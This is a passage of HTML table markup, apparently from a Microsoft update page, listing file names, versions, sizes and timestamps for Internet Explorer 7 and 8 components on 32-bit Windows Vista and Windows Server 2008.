applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2017.0.0.23226</td><td class=\"sbody-td\">390,144</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">13:24</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">479,744</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">480,256</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:25</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">3,625,984</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">1,383,424</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">20:01</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">3,627,008</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:25</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">1,383,424</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">13:04</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">271,872</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6002.18945</td><td class=\"sbody-td\">129,024</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">272,384</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6002.23226</td><td class=\"sbody-td\">129,024</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">766,976</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">766,976</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">106,496</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">106,496</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iebrshim.dll</td><td class=\"sbody-td\">6.0.6002.18945</td><td class=\"sbody-td\">53,760</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iebrshim.dll</td><td class=\"sbody-td\">6.0.6002.23226</td><td class=\"sbody-td\">53,760</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">6,119,424</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">7.0.6002.18945</td><td class=\"sbody-td\">180,736</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">03:07</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">6,120,960</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">7.0.6002.23226</td><td class=\"sbody-td\">180,736</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">14:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieuser.exe</td><td class=\"sbody-td\">6.0.6002.18945</td><td class=\"sbody-td\">304,128</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">20:01</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieuser.exe</td><td class=\"sbody-td\">6.0.6002.23226</td><td class=\"sbody-td\">304,128</td><td class=\"sbody-td\">24-Sep-2013</td><td class=\"sbody-td\">13:05</td><td class=\"sbody-td\">x86</td></tr></table></div><h3 class=\"sbody-h3\">Internet Explorer 8</h3><h4 class=\"sbody-h4\">Internet Explorer 8 on all supported 32-bit versions of Windows Vista and Windows Server 2008</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">1,212,928</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:57</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Urlmon.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">1,215,488</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:16</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">611,840</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:53</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mstime.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">611,840</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">1,469,440</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Inetcpl.cpl</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">1,469,440</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:10</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">2008.0.0.19475</td><td class=\"sbody-td\">18,944</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:49</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Corpol.dll</td><td class=\"sbody-td\">2008.0.0.23532</td><td class=\"sbody-td\">18,944</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:08</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">25,600</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">916,992</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:57</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">64,512</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:57</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsproxy.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">25,600</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininet.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">920,064</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:17</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Wininetplugin.dll</td><td class=\"sbody-td\">1.0.0.1</td><td class=\"sbody-td\">64,512</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:17</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedkcs32.dll</td><td class=\"sbody-td\">18.0.6001.19475</td><td class=\"sbody-td\">387,584</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:50</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedkcs32.dll</td><td class=\"sbody-td\">18.0.6001.23532</td><td class=\"sbody-td\">387,584</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">184,320</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iepeers.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">184,320</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Licmgr10.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">43,520</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Licmgr10.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">43,520</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">743,424</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:50</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iedvtool.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">743,424</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">630,272</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:52</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,876</td><td class=\"sbody-td\">15-Apr-2010</td><td class=\"sbody-td\">01:25</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">630,272</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeeds.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,876</td><td class=\"sbody-td\">19-Apr-2010</td><td class=\"sbody-td\">23:16</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">55,296</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:52</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,938</td><td class=\"sbody-td\">15-Apr-2010</td><td class=\"sbody-td\">01:25</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedssync.exe</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">13,312</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">55,296</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedsbs.mof</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">1,938</td><td class=\"sbody-td\">19-Apr-2010</td><td class=\"sbody-td\">23:16</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Msfeedssync.exe</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">13,312</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">05:34</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2018.0.0.19475</td><td class=\"sbody-td\">385,024</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">11:14</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Html.iec</td><td class=\"sbody-td\">2018.0.0.23532</td><td class=\"sbody-td\">385,024</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">07:29</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">67,072</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:52</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtmled.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">67,072</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">6,017,024</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:52</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">1,638,912</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:27</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">6,017,536</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:12</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Mshtml.tlb</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">1,638,912</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">05:34</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">247,808</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieproxy.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">247,808</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">198,144</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieshims.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">198,144</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieunatt.exe</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">133,632</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:29</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">638,120</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:59</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows feed discovered.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">19,884</td><td class=\"sbody-td\">15-Apr-2010</td><td class=\"sbody-td\">01:19</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows information bar.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">23,308</td><td class=\"sbody-td\">15-Apr-2010</td><td class=\"sbody-td\">01:19</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows navigation start.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">11,340</td><td class=\"sbody-td\">15-Apr-2010</td><td class=\"sbody-td\">01:19</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows pop-up blocked.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">85,548</td><td class=\"sbody-td\">15-Apr-2010</td><td class=\"sbody-td\">01:19</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieunatt.exe</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">133,632</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">05:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iexplore.exe</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">638,120</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:18</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows feed discovered.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">19,884</td><td class=\"sbody-td\">19-Apr-2010</td><td class=\"sbody-td\">23:10</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows information bar.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">23,308</td><td class=\"sbody-td\">19-Apr-2010</td><td class=\"sbody-td\">23:10</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows navigation start.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">11,340</td><td class=\"sbody-td\">19-Apr-2010</td><td class=\"sbody-td\">23:10</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows pop-up blocked.wav</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">85,548</td><td class=\"sbody-td\">19-Apr-2010</td><td class=\"sbody-td\">23:10</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">522,240</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Jsdbgui.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">522,240</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:11</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Desktop.ini</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">65</td><td class=\"sbody-td\">15-Apr-2010</td><td class=\"sbody-td\">01:16</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Occache.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">206,848</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:55</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Desktop.ini</td><td class=\"sbody-td\">Not applicable</td><td class=\"sbody-td\">65</td><td class=\"sbody-td\">19-Apr-2010</td><td class=\"sbody-td\">23:07</td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Occache.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">206,848</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:14</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">2,005,504</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6001.19475</td><td class=\"sbody-td\">129,536</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:57</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iertutil.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">2,006,016</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Sqmapi.dll</td><td class=\"sbody-td\">6.0.6001.23532</td><td class=\"sbody-td\">129,536</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:16</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie4uinit.exe</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">174,080</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:29</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iernonce.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">55,808</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesetup.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">71,680</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ie4uinit.exe</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">174,592</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">05:36</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iernonce.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">55,808</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesetup.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">71,680</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesysprep.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">109,056</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Iesysprep.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">109,056</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:10</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">759,296</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:57</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Vgx.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">759,296</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:16</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">105,984</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:57</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Url.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">105,984</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:16</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">11,111,936</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieui.dll</td><td class=\"sbody-td\">8.0.6001.19475</td><td class=\"sbody-td\">164,352</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">12:51</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Ieframe.dll</td><td class=\"sbody-td\">8.0.6001.23532</td><td class=\"sbody-td\">11,113,472</td><td class=\"sbody-td\">23-Sep-2013</td><td class=\"sbody-td\">09:10</td><td 